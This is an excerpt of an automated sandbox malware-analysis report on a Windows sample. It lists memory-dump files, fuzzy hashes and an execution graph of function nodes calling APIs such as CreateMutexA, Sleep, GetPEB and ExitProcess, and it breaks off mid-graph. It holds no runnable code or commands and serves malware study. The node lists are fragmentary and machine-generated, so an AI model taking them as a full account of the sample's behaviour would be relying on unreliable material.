                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                • String ID:
                                                                                                                • API String ID: 531285432-0
                                                                                                                • Opcode ID: bdfeecb16ad16f5b8ae009b8d1d4696267d323cdfc1847a02ad22d609de0d85e
                                                                                                                • Instruction ID: 173ee21ecea093a8c618173f43f82dcfe81c4cd7c3b43ae23d011def59a12ffd
                                                                                                                • Opcode Fuzzy Hash: bdfeecb16ad16f5b8ae009b8d1d4696267d323cdfc1847a02ad22d609de0d85e
                                                                                                                • Instruction Fuzzy Hash: 30213E71A11219AFDF00EFA4DC969BEBBB9EF08710F511426F941B7261DB309D419BB0

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1846
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 9865 78a079 9868 78a081 shared_ptr 9865->9868 9866 78a154 shared_ptr 9871 7980c0 RtlAllocateHeap 9866->9871 9867 78a930 9869 7b6c6a RtlAllocateHeap 9867->9869 9868->9866 9868->9867 9870 78a953 Sleep CreateMutexA 9869->9870 9873 78a98e 9870->9873 9872 78a903 9871->9872 9874 78cc79 9875 78cc84 shared_ptr 9874->9875 9876 78ccda shared_ptr std::invalid_argument::invalid_argument 9875->9876 9877 7b6c6a RtlAllocateHeap 9875->9877 9878 78ce36 9877->9878 9884 797a00 9878->9884 9880 78ce92 9898 785c10 9880->9898 9882 78ce9d 9949 78ca70 9882->9949 9885 797a26 9884->9885 9886 797a2d 9885->9886 9887 797a81 9885->9887 9888 797a62 9885->9888 9886->9880 9893 79d3e2 RtlAllocateHeap 9887->9893 9895 797a76 __cftof 9887->9895 9889 797ab9 9888->9889 9890 797a69 9888->9890 9891 782480 RtlAllocateHeap 9889->9891 9892 79d3e2 RtlAllocateHeap 9890->9892 9894 797a6f 9891->9894 9892->9894 9893->9895 9894->9895 9896 7b6c6a RtlAllocateHeap 9894->9896 9895->9880 9897 797ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9896->9897 9897->9880 9969 785940 9898->9969 9900 785c54 9972 784b30 9900->9972 9903 785d17 shared_ptr std::invalid_argument::invalid_argument 9903->9882 9904 7b6c6a RtlAllocateHeap 9905 785d47 __cftof 9904->9905 9905->9905 9906 7980c0 RtlAllocateHeap 9905->9906 9908 785e3e 9906->9908 9907 785ea6 shared_ptr std::invalid_argument::invalid_argument 9907->9882 9908->9907 9909 7b6c6a RtlAllocateHeap 9908->9909 9910 785ed2 9909->9910 9911 785ffe shared_ptr std::invalid_argument::invalid_argument 9910->9911 9912 7b6c6a RtlAllocateHeap 9910->9912 9911->9882 9913 78601b 9912->9913 9914 7980c0 RtlAllocateHeap 9913->9914 9915 786089 9914->9915 9916 7980c0 RtlAllocateHeap 9915->9916 9917 7860bd 9916->9917 9918 7980c0 RtlAllocateHeap 9917->9918 9919 7860ee 9918->9919 9920 7980c0 RtlAllocateHeap 9919->9920 9921 78611f 9920->9921 9922 7980c0 RtlAllocateHeap 9921->9922 9924 786150 9922->9924 9923 7865b1 shared_ptr std::invalid_argument::invalid_argument 9923->9882 9924->9923 9925 7b6c6a RtlAllocateHeap 9924->9925 9926 7865dc 9925->9926 9927 797a00 RtlAllocateHeap 9926->9927 9928 7866a6 9927->9928 9929 785c10 4 API calls 9928->9929 9930 7866ac 9929->9930 9931 785c10 4 API calls 9930->9931 9932 7866b1 9931->9932 9979 7822c0 9932->9979 9934 7866c9 shared_ptr 9935 797a00 RtlAllocateHeap 9934->9935 9936 786732 9935->9936 9937 785c10 4 API calls 9936->9937 9938 78673d 9937->9938 9939 7822c0 4 API calls 9938->9939 9948 786757 shared_ptr 9939->9948 9940 786852 9941 7980c0 RtlAllocateHeap 9940->9941 9943 78689c 9941->9943 9942 797a00 RtlAllocateHeap 9942->9948 9944 7980c0 RtlAllocateHeap 9943->9944 9946 7868e3 shared_ptr std::invalid_argument::invalid_argument 9944->9946 9945 785c10 4 API calls 9945->9948 9946->9882 9947 7822c0 4 API calls 9947->9948 9948->9940 9948->9942 9948->9945 9948->9947 9950 78cadd 9949->9950 9951 797a00 RtlAllocateHeap 9950->9951 9952 78cc87 9950->9952 9953 78ccee 9951->9953 9954 78ccda shared_ptr std::invalid_argument::invalid_argument 9952->9954 9957 7b6c6a RtlAllocateHeap 9952->9957 9955 785c10 4 API calls 9953->9955 9956 78ccf9 9955->9956 10476 789030 9956->10476 9959 78ce36 9957->9959 9961 797a00 RtlAllocateHeap 9959->9961 9960 78cd0d 10489 798220 9960->10489 9963 78ce92 9961->9963 9965 785c10 4 API calls 9963->9965 9964 78cd1f 10497 798f40 9964->10497 9966 78ce9d 9965->9966 9967 78ca70 4 API calls 9966->9967 9982 797f80 9969->9982 9971 78596b 9971->9900 9973 784dc2 9972->9973 9977 784b92 9972->9977 9973->9903 9973->9904 9975 784ce5 9975->9973 9976 798ca0 RtlAllocateHeap 9975->9976 9976->9975 9977->9975 9997 7b6da6 9977->9997 10002 798ca0 9977->10002 10190 782280 9979->10190 9984 797fc7 9982->9984 9987 797f9e __cftof 9982->9987 9983 7980b3 9985 799270 RtlAllocateHeap 9983->9985 9984->9983 9988 79801b 9984->9988 9989 79803e 9984->9989 9986 7980b8 9985->9986 9990 782480 RtlAllocateHeap 9986->9990 9987->9971 9988->9986 9992 79d3e2 RtlAllocateHeap 9988->9992 9993 79d3e2 RtlAllocateHeap 9989->9993 9994 79802c __cftof 9989->9994 9991 7980bd 9990->9991 9992->9994 9993->9994 9995 798095 shared_ptr 9994->9995 9996 7b6c6a RtlAllocateHeap 9994->9996 9995->9971 9996->9983 9998 7b6dc2 9997->9998 9999 7b6db4 9997->9999 9998->9977 10017 7b6d19 9999->10017 10003 798dc9 10002->10003 10004 798cc3 10002->10004 10005 799270 RtlAllocateHeap 10003->10005 10007 798d2f 10004->10007 10008 798d05 10004->10008 10006 798dce 10005->10006 10009 782480 RtlAllocateHeap 10006->10009 10010 798d16 __cftof 10007->10010 10014 79d3e2 RtlAllocateHeap 10007->10014 10008->10006 10011 798d10 10008->10011 10009->10010 10012 7b6c6a RtlAllocateHeap 10010->10012 10016 798d8b shared_ptr __cftof 10010->10016 10013 79d3e2 RtlAllocateHeap 10011->10013 10015 798dd8 10012->10015 10013->10010 10014->10010 10016->9977 10022 7b690a 10017->10022 10021 7b6d3d 10021->9977 10023 7b692a 10022->10023 10024 7b6921 10022->10024 10023->10024 10036 7ba671 10023->10036 10030 7b6d52 10024->10030 10031 7b6d8f 10030->10031 10033 7b6d5f 10030->10033 10174 7bb67d 10031->10174 10034 7b6d6e 10033->10034 10169 7bb6a1 10033->10169 10034->10021 10037 7ba67b __dosmaperr 10036->10037 10038 7bd82f __dosmaperr RtlAllocateHeap 10037->10038 10039 7ba694 10037->10039 10041 7ba6bc __dosmaperr 10038->10041 10040 7b694a 10039->10040 10058 7b8bec 10039->10058 10050 7bb5fb 10040->10050 10043 7ba6c4 __dosmaperr 10041->10043 10044 7ba6fc 10041->10044 10045 7badf5 __freea RtlAllocateHeap 10043->10045 10047 7ba49f __dosmaperr RtlAllocateHeap 10044->10047 10045->10039 10048 7ba707 10047->10048 10049 7badf5 __freea RtlAllocateHeap 10048->10049 10049->10039 10051 7bb60e 10050->10051 10052 7b6960 10050->10052 10051->10052 10091 7bf5ab 10051->10091 10054 7bb628 10052->10054 10055 7bb63b 10054->10055 10056 7bb650 10054->10056 10055->10056 10104 7be6b1 10055->10104 10056->10024 10059 7b8bf1 __cftof 10058->10059 10063 7b8bfc ___std_exception_copy 10059->10063 10064 7bd634 10059->10064 10085 7b65ed 10063->10085 10065 7bd640 __cftof 10064->10065 10066 7bd667 __cftof 10065->10066 10067 7ba7c8 __dosmaperr RtlAllocateHeap 10065->10067 10072 7bd66d __cftof 10065->10072 10068 7bd6b2 10066->10068 10066->10072 10084 7bd69c 10066->10084 10067->10066 10069 7b75f6 __dosmaperr RtlAllocateHeap 10068->10069 10070 7bd6b7 10069->10070 10071 7b6c5a ___std_exception_copy RtlAllocateHeap 10070->10071 10071->10084 10073 7bd81b __dosmaperr 10072->10073 10074 7bd726 10072->10074 10076 7bd751 __cftof 10072->10076 10075 7b65ed __cftof 3 API calls 10073->10075 10074->10076 10088 7bd62b 10074->10088 10078 7bd82e 10075->10078 10079 7ba671 __cftof 4 API calls 10076->10079 10082 7bd7a5 10076->10082 10076->10084 10079->10082 10081 7bd62b __cftof 4 API calls 10081->10076 10083 7ba671 __cftof 4 API calls 10082->10083 10082->10084 10083->10084 10084->10063 10086 7b64c7 __cftof 3 API calls 10085->10086 10087 7b65fe 10086->10087 10089 7ba671 __cftof 4 API calls 10088->10089 10090 7bd630 10089->10090 10090->10081 10092 7bf5b7 __cftof 10091->10092 10093 7ba671 __cftof 4 API calls 10092->10093 10094 7bf5c0 __cftof 10093->10094 10097 7bf606 10094->10097 10100 7bf62c 10094->10100 10096 7bf5ef __cftof 10096->10097 10098 7b8bec __cftof 4 API calls 10096->10098 10097->10052 10099 7bf62b 10098->10099 10101 7bf647 10100->10101 10102 7bf63a __dosmaperr 10100->10102 10101->10096 10102->10101 10103 7bf35f __dosmaperr RtlAllocateHeap 10102->10103 10103->10101 10105 7ba671 __cftof 4 API calls 10104->10105 10106 7be6bb 10105->10106 10109 7be5c9 10106->10109 10108 7be6c1 10108->10056 10112 7be5d5 __cftof 10109->10112 10110 7be5f6 10110->10108 10111 7be5ef __cftof 10111->10110 10113 7b8bec __cftof 4 API calls 10111->10113 10112->10111 10116 7badf5 __freea RtlAllocateHeap 10112->10116 10114 7be668 10113->10114 10115 7be6a4 10114->10115 10120 7ba72e 10114->10120 10115->10108 10116->10111 10121 7ba739 __dosmaperr 10120->10121 10122 7bd82f __dosmaperr RtlAllocateHeap 10121->10122 10125 7ba745 10121->10125 10127 7ba769 __dosmaperr 10122->10127 10123 7b8bec __cftof 4 API calls 10124 7ba7c7 10123->10124 10125->10123 10126 7ba7be 10125->10126 10134 7be4b0 10126->10134 10128 7ba771 __dosmaperr 10127->10128 10129 7ba7a5 10127->10129 10131 7badf5 __freea RtlAllocateHeap 10128->10131 10130 7ba49f __dosmaperr RtlAllocateHeap 10129->10130 10132 7ba7b0 10130->10132 10131->10125 10133 7badf5 __freea RtlAllocateHeap 10132->10133 10133->10125 10135 7be5c9 __cftof 4 API calls 10134->10135 10136 7be4c3 10135->10136 10153 7be259 10136->10153 10139 7be4dc 10139->10115 10142 7be51f 10145 7badf5 __freea RtlAllocateHeap 10142->10145 10144 7be512 10146 7be51a 10144->10146 10150 7be535 __cftof 10144->10150 10147 7be52d 10145->10147 10148 7b75f6 __dosmaperr RtlAllocateHeap 10146->10148 10147->10115 10148->10142 10149 7be561 10149->10142 10165 7be14b 10149->10165 10150->10149 10151 7badf5 __freea RtlAllocateHeap 10150->10151 10151->10149 10154 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10153->10154 10155 7be26b 10154->10155 10155->10139 10156 7bb04b 10155->10156 10158 7bb059 __dosmaperr 10156->10158 10157 7b75f6 __dosmaperr RtlAllocateHeap 10159 7bb087 10157->10159 10158->10157 10158->10159 10159->10142 10160 7be6c4 10159->10160 10161 7be259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10160->10161 10164 7be6e4 __cftof 10161->10164 10162 7be75a __cftof std::invalid_argument::invalid_argument 10162->10144 10163 7be32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10163->10162 10164->10162 10164->10163 10166 7be157 __cftof 10165->10166 10167 7be198 __cftof RtlAllocateHeap 10166->10167 10168 7be16e __cftof 10167->10168 10168->10142 10170 7b690a __cftof 4 API calls 10169->10170 10171 7bb6be 10170->10171 10173 7bb6ce std::invalid_argument::invalid_argument 10171->10173 10179 7bf1bf 10171->10179 10173->10034 10175 7ba671 __cftof 4 API calls 10174->10175 10176 7bb688 10175->10176 10177 7bb5fb __cftof 4 API calls 10176->10177 10178 7bb698 10177->10178 10178->10034 10180 7b690a __cftof 4 API calls 10179->10180 10181 7bf1df __cftof 10180->10181 10182 7bf29d std::invalid_argument::invalid_argument 10181->10182 10183 7bb04b __cftof RtlAllocateHeap 10181->10183 10185 7bf232 __cftof 10181->10185 10182->10173 10183->10185 10186 7bf2c2 10185->10186 10187 7bf2ce 10186->10187 10188 7bf2df 10186->10188 10187->10188 10189 7badf5 __freea RtlAllocateHeap 10187->10189 10188->10182 10189->10188 10191 782296 10190->10191 10194 7b87f8 10191->10194 10197 7b7609 10194->10197 10196 7822a4 10196->9934 10198 7b7649 10197->10198 10199 7b7631 10197->10199 10198->10199 10201 7b7651 10198->10201 10200 7b75f6 __dosmaperr RtlAllocateHeap 10199->10200 10202 7b7636 10200->10202 10203 7b690a __cftof 4 API calls 10201->10203 10204 7b6c5a ___std_exception_copy RtlAllocateHeap 10202->10204 10205 7b7661 10203->10205 10206 7b7641 std::invalid_argument::invalid_argument 10204->10206 10210 7b7bc4 10205->10210 10206->10196 10226 7b868d 10210->10226 10212 7b76e8 10223 7b7a19 10212->10223 10213 7b7be4 10214 7b75f6 __dosmaperr RtlAllocateHeap 10213->10214 10215 7b7be9 10214->10215 10216 7b6c5a ___std_exception_copy RtlAllocateHeap 10215->10216 10216->10212 10217 7b7bd5 10217->10212 10217->10213 10233 7b7d15 10217->10233 10241 7b8168 10217->10241 10246 7b7dc2 10217->10246 10251 7b7de8 10217->10251 10280 7b7f36 10217->10280 10224 7badf5 __freea RtlAllocateHeap 10223->10224 10225 7b7a29 10224->10225 10225->10206 10227 7b8692 10226->10227 10228 7b86a5 10226->10228 10229 7b75f6 __dosmaperr RtlAllocateHeap 10227->10229 10228->10217 10230 7b8697 10229->10230 10231 7b6c5a ___std_exception_copy RtlAllocateHeap 10230->10231 10232 7b86a2 10231->10232 10232->10217 10302 7b7d34 10233->10302 10235 7b7d1a 10236 7b7d31 10235->10236 10237 7b75f6 __dosmaperr RtlAllocateHeap 10235->10237 10236->10217 10238 7b7d23 10237->10238 10239 7b6c5a ___std_exception_copy RtlAllocateHeap 10238->10239 10240 7b7d2e 10239->10240 10240->10217 10242 7b8178 10241->10242 10243 7b8171 10241->10243 10242->10217 10311 7b7b50 10243->10311 10247 7b7dcb 10246->10247 10248 7b7dd2 10246->10248 10249 7b7b50 4 API calls 10247->10249 10248->10217 10250 7b7dd1 10249->10250 10250->10217 10252 7b7e09 10251->10252 10253 7b7def 10251->10253 10256 7b75f6 __dosmaperr RtlAllocateHeap 10252->10256 10261 7b7e39 10252->10261 10254 7b7fbb 10253->10254 10255 7b7f4f 10253->10255 10253->10261 10259 7b7fc2 10254->10259 10260 7b8001 10254->10260 10267 7b7f92 10254->10267 10255->10267 10269 7b7f5b 10255->10269 10257 7b7e25 10256->10257 10258 7b6c5a ___std_exception_copy RtlAllocateHeap 10257->10258 10263 7b7e30 10258->10263 10264 7b7fc7 10259->10264 10273 7b7f69 10259->10273 10370 7b8604 10260->10370 10261->10217 10263->10217 10264->10267 10268 7b7fcc 10264->10268 10278 7b7f77 10267->10278 10279 7b7f8b 10267->10279 10355 7b8420 10267->10355 10271 7b7fdf 10268->10271 10272 7b7fd1 10268->10272 10270 7b7fa2 10269->10270 10269->10273 10269->10278 10270->10279 10341 7b8390 10270->10341 10349 7b8571 10271->10349 10272->10279 10345 7b85e5 10272->10345 10273->10278 10273->10279 10364 7b8241 10273->10364 10278->10279 10373 7b86ea 10278->10373 10279->10217 10281 7b7fbb 10280->10281 10282 7b7f4f 10280->10282 10283 7b7fc2 10281->10283 10284 7b8001 10281->10284 10291 7b7f92 10281->10291 10282->10291 10293 7b7f5b 10282->10293 10285 7b7f69 10283->10285 10286 7b7fc7 10283->10286 10287 7b8604 RtlAllocateHeap 10284->10287 10289 7b8241 4 API calls 10285->10289 10300 7b7f77 10285->10300 10301 7b7f8b 10285->10301 10290 7b7fcc 10286->10290 10286->10291 10287->10300 10288 7b8420 RtlAllocateHeap 10288->10300 10289->10300 10294 7b7fdf 10290->10294 10295 7b7fd1 10290->10295 10291->10288 10291->10300 10291->10301 10292 7b7fa2 10297 7b8390 4 API calls 10292->10297 10292->10301 10293->10285 10293->10292 10293->10300 10296 7b8571 RtlAllocateHeap 10294->10296 10298 7b85e5 RtlAllocateHeap 10295->10298 10295->10301 10296->10300 10297->10300 10298->10300 10299 7b86ea 4 API calls 10299->10301 10300->10299 10300->10301 10301->10217 10305 7b7d5e 10302->10305 10304 7b7d40 10304->10235 10307 7b7d80 10305->10307 10306 7b7db7 10306->10304 10307->10306 10308 7b75f6 __dosmaperr RtlAllocateHeap 10307->10308 10309 7b7dac 10308->10309 10310 7b6c5a ___std_exception_copy RtlAllocateHeap 10309->10310 10310->10306 10312 7b7b67 10311->10312 10313 7b7b62 10311->10313 10319 7b8ab6 10312->10319 10314 7b75f6 __dosmaperr RtlAllocateHeap 10313->10314 10314->10312 10317 7b75f6 __dosmaperr RtlAllocateHeap 10318 7b7b99 10317->10318 10318->10217 10320 7b8ad1 10319->10320 10323 7b8868 10320->10323 10324 7b868d RtlAllocateHeap 10323->10324 10327 7b887a 10324->10327 10325 7b88b3 10326 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10325->10326 10333 7b88bf 10326->10333 10327->10325 10328 7b888f 10327->10328 10340 7b7b85 10327->10340 10329 7b75f6 __dosmaperr RtlAllocateHeap 10328->10329 10330 7b8894 10329->10330 10331 7b6c5a ___std_exception_copy RtlAllocateHeap 10330->10331 10331->10340 10332 7b6d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10332->10333 10333->10332 10335 7b88ee 10333->10335 10334 7b8958 10336 7b8a8d RtlAllocateHeap 10334->10336 10335->10334 10337 7b8a8d RtlAllocateHeap 10335->10337 10338 7b8a20 10336->10338 10337->10334 10339 7b75f6 __dosmaperr RtlAllocateHeap 10338->10339 10338->10340 10339->10340 10340->10317 10340->10318 10342 7b83ab 10341->10342 10343 7b83dd 10342->10343 10377 7bc88e 10342->10377 10343->10278 10346 7b85f1 10345->10346 10347 7b8420 RtlAllocateHeap 10346->10347 10348 7b8603 10347->10348 10348->10278 10354 7b8586 10349->10354 10350 7b75f6 __dosmaperr RtlAllocateHeap 10351 7b858f 10350->10351 10352 7b6c5a ___std_exception_copy RtlAllocateHeap 10351->10352 10353 7b859a 10352->10353 10353->10278 10354->10350 10354->10353 10356 7b8433 10355->10356 10357 7b844e 10356->10357 10359 7b8465 10356->10359 10358 7b75f6 __dosmaperr RtlAllocateHeap 10357->10358 10360 7b8453 10358->10360 10363 7b845e 10359->10363 10401 7b779f 10359->10401 10362 7b6c5a ___std_exception_copy RtlAllocateHeap 10360->10362 10362->10363 10363->10278 10365 7b825a 10364->10365 10366 7b779f RtlAllocateHeap 10365->10366 10367 7b8297 10366->10367 10414 7bd3c8 10367->10414 10369 7b830d 10369->10278 10369->10369 10371 7b8420 RtlAllocateHeap 10370->10371 10372 7b861b 10371->10372 10372->10278 10374 7b8707 10373->10374 10375 7b875d std::invalid_argument::invalid_argument 10373->10375 10374->10375 10376 7bc88e __cftof 4 API calls 10374->10376 10375->10279 10376->10374 10380 7bc733 10377->10380 10381 7bc743 10380->10381 10382 7bc76d 10381->10382 10383 7bc781 10381->10383 10392 7bc748 10381->10392 10384 7b75f6 __dosmaperr RtlAllocateHeap 10382->10384 10385 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10383->10385 10386 7bc772 10384->10386 10387 7bc78c 10385->10387 10388 7b6c5a ___std_exception_copy RtlAllocateHeap 10386->10388 10389 7bc79c 10387->10389 10393 7bc7c8 __cftof 10387->10393 10388->10392 10390 7c2b7d __cftof RtlAllocateHeap 10389->10390 10391 7bc7b1 10390->10391 10391->10392 10395 7b75f6 __dosmaperr RtlAllocateHeap 10391->10395 10392->10343 10397 7bc7de __cftof 10393->10397 10400 7bc815 __cftof 10393->10400 10394 7b75f6 __dosmaperr RtlAllocateHeap 10394->10392 10395->10392 10396 7b75f6 __dosmaperr RtlAllocateHeap 10398 7bc87f 10396->10398 10397->10392 10397->10394 10399 7b6c5a ___std_exception_copy RtlAllocateHeap 10398->10399 10399->10392 10400->10392 10400->10396 10402 7b77c3 10401->10402 10403 7b77b4 10401->10403 10405 7b77b9 10402->10405 10406 7bb04b __cftof RtlAllocateHeap 10402->10406 10404 7b75f6 __dosmaperr RtlAllocateHeap 10403->10404 10404->10405 10405->10363 10407 7b77ea 10406->10407 10408 7b7801 10407->10408 10411 7b7a33 10407->10411 10409 7badf5 __freea RtlAllocateHeap 10408->10409 10409->10405 10412 7badf5 __freea RtlAllocateHeap 10411->10412 10413 7b7a42 10412->10413 10413->10408 10415 7bd3d8 10414->10415 10416 7bd3ee 10414->10416 10417 7b75f6 __dosmaperr RtlAllocateHeap 10415->10417 10416->10415 10420 7bd400 10416->10420 10418 7bd3dd 10417->10418 10419 7b6c5a ___std_exception_copy RtlAllocateHeap 10418->10419 10432 7bd3e7 10419->10432 10421 7bd467 10420->10421 10423 7bd439 10420->10423 10422 7bd485 10421->10422 10424 7bd48a 10421->10424 10425 7bd4ae 10422->10425 10426 7bd4e4 10422->10426 10435 7bd2ff 10423->10435 10440 7bcbdf 10424->10440 10428 7bd4cc 10425->10428 10429 7bd4b3 10425->10429 10468 7bcef8 10426->10468 10461 7bd0e2 10428->10461 10451 7bd23e 10429->10451 10432->10369 10436 7bd315 10435->10436 10437 7bd320 10435->10437 10436->10432 10438 7ba1f1 ___std_exception_copy RtlAllocateHeap 10437->10438 10439 7bd37b ___std_exception_copy 10438->10439 10439->10432 10441 7bcbf1 10440->10441 10442 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10441->10442 10443 7bcc05 10442->10443 10444 7bcc0d 10443->10444 10445 7bcc21 10443->10445 10446 7b75f6 __dosmaperr RtlAllocateHeap 10444->10446 10448 7bcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10445->10448 10450 7bcc1c __alldvrm __cftof _strrchr 10445->10450 10447 7bcc12 10446->10447 10449 7b6c5a ___std_exception_copy RtlAllocateHeap 10447->10449 10448->10450 10449->10450 10450->10432 10452 7c31a8 RtlAllocateHeap 10451->10452 10453 7bd26c 10452->10453 10454 7c2c47 RtlAllocateHeap 10453->10454 10455 7bd29e 10454->10455 10456 7bd2a5 10455->10456 10457 7bd2de 10455->10457 10459 7bd2b7 10455->10459 10456->10432 10458 7bcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10457->10458 10458->10456 10460 7bd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10459->10460 10460->10456 10462 7c31a8 RtlAllocateHeap 10461->10462 10463 7bd10f 10462->10463 10464 7c2c47 RtlAllocateHeap 10463->10464 10465 7bd147 10464->10465 10466 7bd14e 10465->10466 10467 7bd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10465->10467 10466->10432 10467->10466 10469 7bcf10 10468->10469 10470 7c31a8 RtlAllocateHeap 10469->10470 10471 7bcf29 10470->10471 10472 7c2c47 RtlAllocateHeap 10471->10472 10473 7bcf6e 10472->10473 10474 7bcf75 10473->10474 10475 7bcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10473->10475 10474->10432 10475->10474 10477 78907f 10476->10477 10478 797a00 RtlAllocateHeap 10477->10478 10479 78908f 10478->10479 10480 785c10 4 API calls 10479->10480 10481 78909a 10480->10481 10482 7980c0 RtlAllocateHeap 10481->10482 10483 7890ec 10482->10483 10484 798220 RtlAllocateHeap 10483->10484 10486 7890fe shared_ptr 10484->10486 10485 78917e shared_ptr std::invalid_argument::invalid_argument 10485->9960 10486->10485 10487 7b6c6a RtlAllocateHeap 10486->10487 10488 7891aa 10487->10488 10490 798248 10489->10490 10491 798292 10489->10491 10490->10491 10492 798251 10490->10492 10494 798f40 RtlAllocateHeap 10491->10494 10496 7982a1 10491->10496 10518 799280 10492->10518 10494->10496 10495 79825a 10495->9964 10496->9964 10498 798f6b 10497->10498 10499 79908e 10497->10499 10502 798fdc 10498->10502 10503 798fb2 10498->10503 10500 799270 RtlAllocateHeap 10499->10500 10501 799093 10500->10501 10504 782480 RtlAllocateHeap 10501->10504 10507 79d3e2 RtlAllocateHeap 10502->10507 10510 798fc3 __cftof 10502->10510 10503->10501 10505 798fbd 10503->10505 10504->10510 10506 79d3e2 RtlAllocateHeap 10505->10506 10506->10510 10507->10510 10508 7b6c6a RtlAllocateHeap 10509 79909d 10508->10509 10511 7990b8 10509->10511 10513 7990be 10509->10513 10514 782480 std::_Throw_future_error 10509->10514 10510->10508 10515 79904c shared_ptr __cftof 10510->10515 10512 79d3e2 RtlAllocateHeap 10511->10512 10512->10513 10513->9952 10516 7b38af ___std_exception_copy RtlAllocateHeap 10514->10516 10515->9952 10517 7824c3 10516->10517 10517->9952 10519 799294 10518->10519 10522 7992a5 __cftof 10519->10522 10523 7994e0 10519->10523 10521 79932b 10521->10495 10522->10495 10524 799619 10523->10524 10525 79950b 10523->10525 10526 799270 RtlAllocateHeap 10524->10526 10529 799579 10525->10529 10530 799552 10525->10530 10527 79961e 10526->10527 10528 782480 RtlAllocateHeap 10527->10528 10536 799563 __cftof 10528->10536 10534 79d3e2 RtlAllocateHeap 10529->10534 10529->10536 10530->10527 10531 79955d 10530->10531 10533 79d3e2 RtlAllocateHeap 10531->10533 10532 7b6c6a RtlAllocateHeap 10535 799628 shared_ptr 10532->10535 10533->10536 10534->10536 10535->10521 10536->10532 10537 7995e1 shared_ptr __cftof 10536->10537 10537->10521 10538 782070 10539 7980c0 RtlAllocateHeap 10538->10539 10540 782081 10539->10540 10543 79d64e 10540->10543 10546 79d621 10543->10546 10547 79d630 10546->10547 10548 79d637 10546->10548 10552 7b988e 10547->10552 10555 7b98fa 10548->10555 10551 78208b 10553 7b98fa RtlAllocateHeap 10552->10553 10554 7b98a0 10553->10554 10554->10551 10558 7b9630 10555->10558 10557 7b992b 10557->10551 10559 7b963c __cftof 10558->10559 10562 7b968b 10559->10562 10561 7b9657 10561->10557 10563 7b96a7 10562->10563 10565 7b971e __dosmaperr 10562->10565 10564 7b96fe 10563->10564 10563->10565 10572 7bedf6 10563->10572 10564->10565 10567 7bedf6 RtlAllocateHeap 10564->10567 10565->10561 10569 7b9714 10567->10569 10568 7b96f4 10570 7badf5 __freea RtlAllocateHeap 10568->10570 10571 7badf5 __freea RtlAllocateHeap 10569->10571 10570->10564 10571->10565 10573 7bee1e 10572->10573 10574 7bee03 10572->10574 10576 7bee2d 10573->10576 10581 7c4fdc 10573->10581 10574->10573 10575 7bee0f 10574->10575 10577 7b75f6 __dosmaperr RtlAllocateHeap 10575->10577 10588 7c500f 10576->10588 10580 7bee14 __cftof 10577->10580 10580->10568 10582 7c4ffc 10581->10582 10583 7c4fe7 10581->10583 10582->10576 10584 7b75f6 __dosmaperr RtlAllocateHeap 10583->10584 10585 7c4fec 10584->10585 10586 7b6c5a ___std_exception_copy RtlAllocateHeap 10585->10586 10587 7c4ff7 10586->10587 10587->10576 10589 7c501c 10588->10589 10590 7c5027 10588->10590 10591 7bb04b __cftof RtlAllocateHeap 10589->10591 10592 7c502f 10590->10592 10595 7c5038 __dosmaperr 10590->10595 10596 7c5024 10591->10596 10593 7badf5 __freea RtlAllocateHeap 10592->10593 10593->10596 10594 7b75f6 __dosmaperr RtlAllocateHeap 10594->10596 10595->10594 10595->10596 10596->10580 10601 784276 10606 782410 10601->10606 10605 78428f 10607 782424 10606->10607 10621 79b52d 10607->10621 10610 783ce0 10611 783d42 10610->10611 10613 783d52 10610->10613 10677 797d50 10611->10677 10614 79d3e2 RtlAllocateHeap 10613->10614 10615 783d84 10614->10615 10616 797d50 RtlAllocateHeap 10615->10616 10618 783e03 10615->10618 